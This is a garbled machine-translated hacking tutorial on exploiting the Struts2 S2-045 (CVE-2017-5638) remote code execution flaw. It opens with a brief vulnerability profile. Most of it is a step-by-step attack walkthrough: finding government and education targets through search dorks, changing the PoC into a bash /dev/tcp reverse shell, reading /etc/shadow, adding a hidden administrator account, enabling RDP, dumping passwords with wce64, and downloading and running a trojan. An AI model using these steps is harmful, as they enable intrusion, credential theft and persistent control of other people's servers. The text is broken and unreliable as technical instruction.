Lucene search

HistoryMar 08, 2017 - 12:00 a.m.

How fast the use of s02-45 vulnerability to gain server access-vulnerability warning-the black bar safety net






1.1 CVE-2017-5638 vulnerability profile
Apache Struts 2 is the world’s most popular JavaWeb Server framework. However, in Struts 2 found that the presence of high-risk security vulnerability, CVE-2017-5638,S02-45,and the vulnerability impact to: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts2. 5. 10
Vulnerability ID: CVE-2017-5638
Vulnerability rating: HIGH
Vulnerability name: S2-045: Struts 2 remote code execution vulnerability
Vulnerability impact: based on the JakartaMultipart the parser implementation file upload when possible RCE
Affected version: Struts 2.3.5-Struts 2.3.31
The Struts 2.5-Struts 2.5.10
Repair solutions:
Upgrade to Struts2. 3. 32 or the Struts
Struts2. 3. 32 download address:
Struts2. 5. 10. 1 Download:
The vulnerability principle: Struts2 default parse the uploaded file’s Content-Type header, there is a problem. In the Parse error case, the error information in the OGNL code.
1.2 hazard assessment
After the actual test, as long as the vulnerability exists for windows and linux are Server Permissions. Great harm, to be sure for many people tonight is a sleepless night.

  1. 3 vulnerabilities in the actual use of 1. 3. 1 Ready to work
    1. Get ready for a jsp webshell, the Save on the site, for example, may be 1. txt and other text file, for network download.
    2. Ready to have a separate IP of the server, 在上面有nc.exe the.
    3. Prepare python environment.
    General use python2. 7. 13 version, download address:, according to theoperating systemversion of the Select the installation, after the installation is complete first run will error, you need to install a module, shown in Figure 1. Need to install the poster. the encode module download address: https://pypi. python. org/pypi/poster/, the 然后 到 该 目录 执行 install, to install. Note that in python if you do not set system variables, you’ll need to strip the full path to execute. For example:
    C:\Python27\python.exeC:\Python27\poster-0.8.1\ install
    ! [](/Article/UploadPic/2017-3/20173818228916. jpg? www. myhack58. com)
    Figure 1 The Missing poster. the encode module
    4. Get a variety of action page
    (1)by zoomeye to get a variety of action page to search the index. action, login. action, info. action and the like.
    (2)Baidu aunt law
    inurl:index. actionsite:edu. cn
    inurl:index. actionsite:gov. cn
    inurl:index. actionsite:com. cn
    Note: don’t vandalize, and now the network security method very good it!!!
    1.3.2 modify the poc exploit code
  2. For the linux version of the modified whoami values: bash-i>& /dev/tcp/ 0>&1
    Description of 122. 115. 47. 39 for a rebound the Monitoring Server IP, port 4433, the 然后 将 文件 保存 为 as shown in Figure 2. Also there can be some other common commands: id, whomai, cat /etc/passwd, cat/etc/shadow, etc. You can modify the corresponding parameters and keep a different name.
    ! [](/Article/UploadPic/2017-3/20173818228744. jpg? www. myhack58. com)
    Figure 2 modify the linux poc exploit code
  3. Corresponding Windows Server, modify the whomai value:
    net user antian365$ Wsantian365!*/ add
    net localgroup administratorsantian365$ /add
    分别 将 poc 文件 保存 为 and as shown in Figure 3.
    ! [](/Article/UploadPic/2017-3/20173818228139. jpg? www. myhack58. com)
    Figure 3 modify the windows under the use of the code
    1.3.3 under Windows fast implement penetration
  4. Each other to open up 3389
    (1)scanning each other whether to open the 3389, open a, respectively, to execute:
    If the other loopholes, then it will directly add a user“antian365$”, password“Wsantian365!*”, the Server to open the 3389, sign up and then download wce64, directly wce64 –w to get the current login password, be sure to use administrator rights to execute.
    (2)directly on 3389
    In the parameters were modified three times, execute the following code three times, you can open 3389.
    wmic /namespace:\\root\cimv2\terminalservices pathwin32_terminalservicesetting where (__CLASS != “”) callsetallowtsconnections 1
    wmic/namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where(TerminalName =‘RDP-Tcp’) call setuserauthenticationrequired 1
    reg add"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /vfSingleSessionPerUser /t REG_DWORD /d 0 /f
    3389 is open on the condition that the other party is independent of the IP, if it is within the network IP the case of the second method.
  5. The Trojan executes the law
    (1)Download the Trojan
    First you need to prepare a Trojan program, you need to through win2008. Then modify the win. py in the whoami parameters:
    Germany /transfer myjob1/download /priority normal c:\windows\temp\ma.exe
    ma. exe save in www. myhack58. com web site root directory, it will download directly to the other party c:\windows\temp directory.
    (2)the execution of the Trojan, to modify the poc in the whoami parameters for the ma. exe to the true path and the address, as follows. Run save after the poc is in the original implementation.
    1.3. 4Linux under the rapid penetration of the ideas
  6. On a standalone server to perform monitoring, required in the independent IP on the server, execute“nc –vv–l –p 4433”, you can perform the connection about this IP the 4433 port. For example, http://www. myhack58. com:4433, if the listening port has data, it indicates the normal, otherwise check the firewall rules.
  7. Perform poc

[1] [2] [3] next